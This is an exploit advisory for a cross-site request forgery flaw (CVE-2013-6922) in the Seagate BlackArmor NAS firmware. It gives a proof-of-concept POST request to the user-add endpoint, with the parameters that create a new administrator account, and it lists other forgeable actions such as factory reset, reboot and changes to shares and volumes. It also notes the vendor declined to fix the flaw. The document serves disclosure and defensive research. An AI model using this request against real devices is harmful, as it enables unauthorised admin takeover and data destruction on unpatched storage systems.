# Exploit Title: Seagate BlackArmor NAS - Cross Site Request Forgery   # Google Dork: N/A   # Date: 04-01-2014   # Exploit Author: Jeroen - IT Nerdbox   # Vendor Homepage: http://www.seagate.com/   # Software Link: http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/   # Version: sg2000-2000.1331   # Tested on: N/A   # CVE : CVE-2013-6922   #   ## Description:   #   # There are multiple CSRF attacks possible, the proof of concept shows how it is possible to add   # a user with administrative privileges to the system. # # It is also possible to:   #    # 1. Factory reset the device   # 2. Reboot the device   # 3. Add/Edit/Remove users # 4. Add/Edit/Remove shares and volumes   # # This vulnerability was reported to Seagate in September 2013, they stated that this will not be fixed.    #   ## Proof of Concept:   #    # POST: http(s)://<url | ip>/admin/access_control_user_add.php?lang=en&gi=a001&fbt=23 # Parameters:   #   # username attacker # adminright yes # fullname hacker # userpasswd attackers_password # userpasswdcheck attackers_password